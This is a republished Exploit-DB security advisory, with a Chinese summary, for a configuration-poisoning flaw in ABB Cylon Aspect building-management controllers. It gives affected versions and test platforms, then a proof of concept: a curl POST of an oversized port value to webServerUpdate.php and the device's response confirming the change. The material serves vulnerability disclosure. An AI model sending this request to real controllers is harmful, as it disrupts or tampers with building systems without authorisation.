[hardware] ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning
ABB Cylon Aspect 3.08.02 存在输入验证漏洞,影响 NEXUS 系列等设备。攻击者可利用 webServerUpdate.php 中未正确验证的 port 参数注入任意整数值,导致配置中毒、服务中断或服务器设置篡改。该漏洞已在多种 Linux 和 PHP 环境中复现。 2025-4-15 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏
ABB Cylon Aspect 3.08.02 存在输入验证漏洞,影响 NEXUS 系列等设备。攻击者可利用 webServerUpdate.php 中未正确验证的 port 参数注入任意整数值,导致配置中毒、服务中断或服务器设置篡改。该漏洞已在多种 Linux 和 PHP 环境中复现。 2025-4-15 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from improper input validation on
the port POST parameter in the webServerUpdate.php script. This input is not
validated on the server side and relies on bypassable client-side checks using
the inString.js script to verify that the port parameter contains only characters
from the set (0123456789). Attackers can bypass these checks and supply arbitrary
integer values. Exploitation of this issue can result in configuration poisoning,
Denial of Service (DoS) through malformed configurations, or manipulation of
server settings via Cross-Site Request Forgery (CSRF) combined with authentication
bypass.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>The ABB Group</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
<tr>
<td width="100%" valign="top">
Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue. </td>
</tr>
</table>
<iframe src="webServerUpdateRun.php" style="visibility:hidden;">
</iframe>
</body>
</html>
文章来源: https://www.exploit-db.com/exploits/52219
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh